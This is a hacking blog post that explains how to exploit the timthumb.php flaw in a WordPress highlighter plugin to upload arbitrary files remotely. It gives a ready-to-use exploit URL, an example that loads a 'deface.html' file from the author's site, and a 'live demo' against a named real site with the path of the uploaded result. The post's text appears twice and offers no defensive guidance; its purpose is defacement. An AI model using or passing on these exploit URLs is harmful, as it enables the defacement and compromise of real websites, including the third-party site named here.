wordpress timthumb remote file upload Vulnerability -- Website Hacking
wordpress timthumb remote file upload Vulnerability --Website Hacking
in this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website
this bug known as "timthumb.php" exploit
exploit: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
example : http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
after acessing this url that file will upload on website remotly on website
to view your uploaded file goto :
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(file will upload with a random name like fe0555b78d04cb3c76cff7e10cf05b77, check last file to view your file)
live Demo : http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html
Result :http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html
Liked Post ? leave a Comment :)
http://www.devilscafe.in/2012/04/wordpress-timthumb-remote-file-include.html
in this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website
this bug known as "timthumb.php" exploit
exploit: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
example : http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
after acessing this url that file will upload on website remotly on website
to view your uploaded file goto :
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(file will upload with a random name like fe0555b78d04cb3c76cff7e10cf05b77, check last file to view your file)
live Demo : http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html
Result :http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html
Liked Post ? leave a Comment :)
http://www.devilscafe.in/2012/04/wordpress-timthumb-remote-file-include.html
Tags: Exploit, remote upload, Vulnerability, Web Application Security, Website Hacking, wordpress, wordpress hacking
Previous Article
Subscribe to:
Post Comments (Atom)
Share your views...
0 Respones to "wordpress timthumb remote file upload Vulnerability -- Website Hacking"
Post a Comment